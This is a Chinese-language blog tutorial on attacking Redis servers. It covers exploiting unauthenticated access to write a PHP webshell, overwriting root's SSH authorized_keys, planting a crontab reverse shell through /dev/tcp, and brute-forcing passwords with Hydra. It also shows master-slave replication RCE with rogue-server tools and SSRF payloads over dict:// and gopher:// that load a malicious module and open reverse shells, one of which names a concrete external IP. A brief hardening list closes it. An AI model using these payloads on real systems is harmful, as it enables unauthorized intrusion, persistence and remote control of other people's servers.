Redis渗透SSRF的利用

news2024/11/18 9:37:38

Redis是什么?

Redis是NoSQL数据库之一,它使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库。默认端口是:6379

工具安装

下载地址:

http://download.redis.io/redis-stable.tar.gz

然后进行配置:

cd redis-stable 
make //全局生效 
cp src/redis-cli /usr/bin/

成功后
image.png

Redis常用的命令

redis-cli -h ip -p port -a pass // 连接redis数据库,如果无密码
info // 返回关于Redis 服务器的各种信息和统计数值
info persistence // 主要查看后台有没有运行任务
flushall										    # 删除所有键
keys *											    # 查询所有键,也可用配合正则查询指定键
get 键名											  # 查询数据
del	键名											  # 删除数据
exists 键名										  # 判断键是否存在

config set protected-mode no # 关闭安全模式

slaveof host port						 # 设置主节点
config set protected-mode no # 关闭安全模式
config set dir /tmp					 # 设置保存目录
config set dbfilename exp.so # 设置保存文件名
config get dir							 # 查看保存目录
config get dbfilename			   # 查看保存文件名
save											   # 执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。
slaveof no one  						 # 断开主节点	
module list 								 #redis4.x版本以上有模块功能,查询有什么模块
module load exp.so		 			 #加载exp.so文件模块
quit												 #退出

Redis未授权

漏洞原因在于,没有设置密码,攻击者直接连接Redis数据库,进行操作。

redis-cli -h xx.xx.xx.xx -p 6379

redis-cli 默认访问6379端口,可以看见不需要密码,也能执行info操作,说明存在未授权漏洞
image.png

Redis的攻击面

如果没有权限,就会遇到如图类似的这个,无权限。反之则返回OK
image.png

web目录下写webshell

info persistence //获取关于 Redis 持久性配置和状态的信息
config set dir /var/www/html  // 设置要配置的目录
config set dbfilename cike.php  //设置要配置的文件名
set shell "\n\n\n<?php phpinfo();?>\n\n\n"  //设置键名还有键的值
save //最后保存
  • 使用 \n 是为了在 Redis 中正确表示和保留换行符,以确保保存和读取时的一致性。
  • 当 rdb_bgsave_in_progress:0 为0时,save才能保存成功。除非权限不够。
  • rdb_bgsave_in_progress为1时,表示当前已经有一个后台保存操作正在进行中

image.png
最后可以看见 php文件,写入网站成功

替换公钥

攻击机上生成key,id_rsa.pub文件就是我们要替换的

ssh-keygen -t rsa

image.png
然后将公钥导入key.txt文件(前后用\n\n换行,避免和Redis里其他缓存数据混合)

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

image.png
这时候,我们将 key.txt 的公钥内容写入到目标主机的缓冲里:

cat key.txt| redis-cli -h xx.xx.xx.xx -x set ssh

image.png
连接目标主机的Redis,可以看见刚刚写入的ssh键值数据还在

get ssh  //查看ssh键名数据是否存在

image.png
然后执行以下命令:

config set dir /root/.ssh // 设置可写目录
config set dbfilename authorized_keys  //设置可写的键名
save //保存
keys * //查看存在的键名

image.png

通过crontab写反弹shell

连接redis后,使用以下命令

set cike "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/attack_ip/port 0>&1\n\n" //设置cike键名及值
config set dir /var/spool/cron // 使用centos的定时任务目录,ubuntu的为/var/spool/cron/crontabs目录
config set dbfilename shell //设置可写的文件名
save //保存

image.png
keys * 查看存在的键名,可以发现cike写入成功
image.png

使用Hydra爆破Redis密码

hydra -P passwd.txt redis://xx.xx.xx.xx

Redis主从复制导致RCE

漏洞原理

可以大概这样子理解,我们做主机,目标做从机。漏洞版本的范围是在 redis_version: 4.x-5.x之间
在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以自定义新的的Redis命令,要通过写c语言并编译出.so文件才可以。
我们可以通过手法来上传so文件,这时候redis的module命令进行加载.so文件,就可以执行一些敏感命令。

远程主从复制

Redis运行远程服务器进行连接的时候,就叫做远程主从复制
使用以下工具:

https://github.com/n0b0dyCN/redis-rogue-server

利用方式:

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip

image.png
如果目标Redis服务开启了认证功能,可以添加 --passwd 参数

python3 redis-rogue-server.py --rhost target_ip --lhost attack_ip --passwd 123456

本地主从复制

当Redis数据库,只允许本地127.0.0.1进行连接,这时候就叫本地主从复制。

dict+ssrf(未授权)

dict协议通常用于探测端口毕竟方便,可以看见有回显
image.png
如果是http探测则会一直连接
image.png
通常使用dict协议爆破密码

?url=dict://0.0.0.0:6379/AUTH:root  //密码认证:root,可以利用这个爆破密码

可以看见返回了OK
image.png
如果是密码错误则如图
image.png
dict协议只能执行一条redis命令,通常用于未授权的redis操纵比较好

?url=dict://0.0.0.0:6379/SLAVEOF:107.149.212.113:15000 //连接我们的主机ip及设置的端口
?url=dict://0.0.0.0:6379/CONFIG:SET:dir:/tmp/
?url=dict://0.0.0.0:6379/config:set:dbfilename:exp.so  
?url=dict://0.0.0.0:6379/MODULE:LOAD:/tmp/exp.so  //加载exp.so
?url=dict://0.0.0.0:6379/slaveof:no:one  //断开主从
?url=dict://0.0.0.0:6379/system.exec:whoami //命令执行
?url=dict://0.0.0.0:6379/system.rev xx.xx.xx.xx 4444 //反弹shell

gopher+ssrf(密码认证)

gopher协议的优点是可以执行多行命令,可以一次性执行完要执行的命令。
空格二次编码后为%2520,换行符二次编码后为%250a;需要在每条命令后加上换行符

gopher://0.0.0.0:6379/_AUTH%2520(密码)%250a(执行的redis命令)%250aquit 

//执行不同的命令需要换行符加上%250a

主从复制的payload:

gopher://0.0.0.0:6379/_AUTH%2520root%250ainfo%250aquit //查看服务器信息,及进行密码root验证登录息,及进行密码root验证登录
gopher://0.0.0.0:6379/_AUTH%2520root%250aSLAVEOF xx.xx.xx.xx 1111%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aCONFIG SET dir /tmp/%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aconfig set dbfilename exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aMODULE LOAD /tmp/exp.so%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.exec whoami%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250asystem.rev xx.xx.xx.xx 4444%250aquit
gopher://0.0.0.0:6379/_AUTH%2520root%250aslaveof no one%250aquit

image.png
这里使用这个工具做个例子演示,配合上面的payload进行本地主从复制:

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

攻击端:

python3 redis_rogue_server.py -v -path exp.so -lport 1111
// 开启主机以及端口,让redis连接这个主机,获取exp.so

image.png
这时候,我们在客户端输入之前的payload:gopher+ssrf,就可以利用了
关于其他的工具:

https://github.com/xmsec/redis-ssrf  //ssrf+gopher
https://github.com/firebroo/sec_tools //gopher 编码payload

防御

  • redis.conf的requirepass更改密码为强密码,防止未授权
  • redis.conf的port进行默认端口更改
  • 不以高权限用户运行redis,如root
  • protected-mode 设置开启保护模式

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1438038.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【XR806开发板试用】 GPIO驱动LED

按照教程来学习下GPIO驱动LED指示灯 一、硬件电路 使用板卡上D1指示灯测试 二、驱动程序部分 在ohosdemo目录下创建文件 编辑ohosdemo/BUILD.gn文件 编辑ohosdemo/led/BUILD.gn文件 编辑ohosdemo/led/src/main.c文件 三、编译程序 将编译好的程序下载到开发板 四…

完全让ChatGPT写一个风格迁移的例子,不改动任何代码

⭐️ 前言 小编让ChatGPT写一个风格迁移的例子&#xff0c;注意注意&#xff0c;代码无任何改动&#xff0c;直接运行&#xff0c;输出结果。 额。。。。这不是风格转换后的结果图。 ⭐️ 风格迁移基本原理 风格迁移是一种计算机视觉领域的图像处理技术&#xff0c;它的目标…

BUUCTF-Real-[Tomcat]CVE-2017-12615

目录 漏洞描述 一、漏洞编号&#xff1a;CVE-2017-12615 二、漏洞复现 get flag 漏洞描述 CVE-2017-12615&#xff1a;远程代码执行漏洞 影响范围&#xff1a;Apache Tomcat 7.0.0 - 7.0.79 (windows环境) 当 Tomcat 运行在 Windows 操作系统时&#xff0c;且启用了 HTTP P…

Stable Diffusion 模型下载:Schematics(原理图)

文章目录 模型介绍生成案例案例一案例二案例三案例四案例五案例六案例七案例八案例九案例十 下载地址 模型介绍 “Schematics”是一个非常个性化的LORA&#xff0c;我的目标是创建一个整体风格&#xff0c;但主要面向某些风格美学&#xff0c;因此它可以用于人物、物体、风景等…

微信小程序合集更更更之实现仿网易云播放动效

实现效果 写在最后&#x1f352; 源码&#xff0c;关注&#x1f365;苏苏的bug&#xff0c;&#x1f361;苏苏的github&#xff0c;&#x1f36a;苏苏的码云~

【Leetcode】2641. 二叉树的堂兄弟节点 II

文章目录 题目思路代码结果 题目 题目链接 给你一棵二叉树的根 root &#xff0c;请你将每个节点的值替换成该节点的所有 堂兄弟节点值的和 。 如果两个节点在树中有相同的深度且它们的父节点不同&#xff0c;那么它们互为 堂兄弟 。 请你返回修改值之后&#xff0c;树的根 …

TitanIDE:v2.8.0正式发布,模板市场来袭!

TitanIDE v2.8.0版本正式发布&#xff0c;模板市场中内置40模版&#xff01; 什么是TitanIDE TitanIDE&#xff0c;云端IDE&#xff0c;作为数字化时代研发体系不可或缺的一环&#xff0c;和企业建设好的云服务具有很高的互操作性。秉承“安全、高效、体验”的原则&#xff0…

open3d进行ICP点云配准

一、代码 import numpy as np import open3d as o3d from scipy.spatial.transform import Rotation as R# 1. 加载源点云和目标点云 source o3d.io.read_point_cloud("bun_zipper.ply") target o3d.io.read_point_cloud("bun_zipper2.ply") source.pai…

金融信贷风控特征计算详解

特征的含义&#xff1f; 特征可以说是风控系统中的最小单元&#xff0c;是风控工具的重要组成部分&#xff0c;我们也可以理解成变量。不过叫什么问题不大&#xff0c;团队内有相同的共识就行。 风控特征是我们做数字化线上风控中的重要组成部分&#xff0c;几乎可以说没有风…

[C++]类和对象(下)

一:再谈构造函数 1.1 构造函数体赋值 在创建对象时&#xff0c;编译器通过调用构造函数&#xff0c;给对象中各个成员变量一个合适的初始值,虽然构造函数调用之后&#xff0c;对象中已经有了一个初始值&#xff0c;但是不能将其称为对对象中成员变量的初始化 构造函数体中的语…

Rust开发WASM,浏览器运行WASM

首先需要安装wasm-pack cargo install wasm-pack 使用cargo创建工程 cargo new --lib mywasm 编辑Cargo.toml文件&#xff0c;修改lib的类型为cdylib&#xff0c;并且添加依赖wasm-bindgen [package] name "mywasm" version "0.1.0" edition "…

精酿啤酒:使用全麦芽酿造的优点与挑战

全麦芽酿造是指使用全部麦芽而非仅使用部分麦芽进行啤酒酿造的过程。近年来&#xff0c;全麦芽酿造在啤酒行业中逐渐受到关注。对于Fendi Club啤酒来说&#xff0c;使用全麦芽酿造也带来了一些优点和挑战。 使用全麦芽酿造的优点首先体现在啤酒的口感和风味上。全麦芽含有更多的…

正点原子--STM32通用定时器学习笔记(2)

1. 通用定时器输入捕获部分框图介绍 捕获/比较通道的输入部分&#xff08;通道1&#xff09; 输入通道映射CC1S[1:0]→采样频率CKD[1:0]→滤波方式IC1F[3:0]→边沿检测方式CC1P→捕获分频ICPS[1:0]→使能捕获CC1E 输入部分对相应的TIx输入信号采样&#xff0c;并产生一个滤波后…

论文阅读-Transformer-based language models for software vulnerability detection

「分享了一批文献给你&#xff0c;请您通过浏览器打开 https://www.ivysci.com/web/share/biblios/D2xqz52xQJ4RKceFXAFaDU/ 您还可以一键导入到 ivySCI 文献管理软件阅读&#xff0c;并在论文中引用 」 本文主旨&#xff1a;本文提出了一个系统的框架来利用基于Transformer的语…

【教学类-47-01】UIBOT+IDM下载儿童古诗+修改文件名

背景需求&#xff1a; 去年12月&#xff0c;我去了其他幼儿园参观&#xff0c;这是一个传统文化德育教育特色的学校&#xff0c;在“古典集市”展示活动中&#xff0c;小班中班大班孩子共同现场念诵《元日》《静夜思》包含了演唱版本和儿歌念诵版本。 我马上也要当班主任了&a…

【OpenVINO™】在 MacOS 上使用 OpenVINO™ C# API 部署 Yolov5 (下篇)

在 MacOS 上使用 OpenVINO™ C# API 部署 Yolov5 &#xff08;下篇&#xff09; 项目介绍 YOLOv5 是革命性的 "单阶段"对象检测模型的第五次迭代&#xff0c;旨在实时提供高速、高精度的结果&#xff0c;是世界上最受欢迎的视觉人工智能模型&#xff0c;代表了Ult…

单片机学习笔记---串口通信(1)

目录 通信的基本概念 通信的方式 1.按照数据传送的方式&#xff0c;可分为串行通信和并行通信。 1.1串行通信 1.2并行通信 2.按照通信的数据同步方式&#xff0c;又可以分为异步通信和同步通信。 2.1 异步通信 2.2同步通信 3.按照数据的传输方向&#xff0c;又可以分为…

【JAVA WEB】Web标签

目录 注释标签 标题标签 h1-h6 段落标签 换行标签 格式化标签 加粗&#xff1a;strong 标签和 b 标签 倾斜&#xff1a;em 标签和 i 标签 删除线&#xff1a; del 标签 和 s 标签 下划线&#xff1a;ins 标签 和 u 标签 图片标签&#xff1a;img 单标签 src属性&#…

零基础学Python之网络编程

1.什么是socket 官方定义&#xff1a; 套接字&#xff08;socket&#xff09;是一个抽象层&#xff0c;应用程序可以通过它发送或接收数据&#xff0c;可对其进行像对文件一样的打开、读写和关闭等操作。套接字允许应用程序将I/O插入到网络中&#xff0c;并与网络中的其他应用…

外汇天眼:台中女老板扮演诈团「假币商」,诓134人投资吸金1.8亿

自从比特币问世以来&#xff0c;加密货币为金融领域带来极大的转变&#xff0c;而且随着区块链与各种技术发展&#xff0c;其影响力逐渐扩大&#xff0c;受到愈来愈多投资人重视&#xff0c;相关的金融商品与合约也愈来愈多元&#xff0c;更带起一波投资热潮。 然而&#xff0…